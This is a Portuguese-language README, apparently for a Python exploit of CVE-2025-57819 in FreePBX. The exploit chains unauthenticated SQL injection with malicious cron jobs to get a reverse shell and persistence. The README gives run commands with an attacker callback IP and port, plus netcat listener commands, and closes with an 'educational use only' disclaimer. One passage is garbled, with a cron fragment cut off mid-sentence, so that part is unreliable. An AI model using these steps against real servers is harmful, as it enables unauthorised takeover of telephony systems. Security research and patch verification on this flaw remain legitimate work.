
Exploit em Python para CVE-2025-57819 direcionado ao FreePBX via injeção SQL não autenticada para obter execução remota de código com shell reverso automático e persistência baseada em cron.
< 15.0.66, < 16.0.89 e < 17.0.3Este script explora CVE-2025-57819 em um módulo endpoint vulnerável do FreePBX. A vulnerabilidade permite injeção de SQL, que é usada para injetar cron jobs maliciosos.
Não há nenhum passo adicional necessário, como em outros exploits públicos que interagem com o alvo através de uma webshell enviada. É uma abordagem direta que lhe trará acesso direto a um reverse shell.
A execução remota de código é alcançada através de injeção de SQL e manipulação de cron jobs. A exploração bem-sucedida resulta em um reverse shell no sistema alvo. Dependendo da configuração, isso pode levar ao comprometimento total do sistema.
* * * * *)base64 são corrompidos quando caracteres + são interpretados como espaços.Execute o exploit fornecendo a configuração do alvo e do listener:
python3 cve-2025-57819.py <target> <lhost> <lport>
<target>: Hostname ou endereço IP do alvo (instância vulnerável do FreePBX)<lhost>: Endereço IP do atacante para callback do reverse shell<lport>: Porta de escuta para a conexão de entradapython3 cve-2025-57819.py freepbx.local 10.10.16.38 9999
Inicie um listener antes de executar o exploit:
nc -lvnp <port>
nc -nlvp 9999
Esta ferramenta destina-se apenas a fins educacionais e testes de segurança autorizados. O uso não autorizado contra sistemas sem permissão explícita é ilegal. O autor não assume responsabilidade por uso indevido ou danos causados por esta ferramenta.
Its1Zero - [email protected]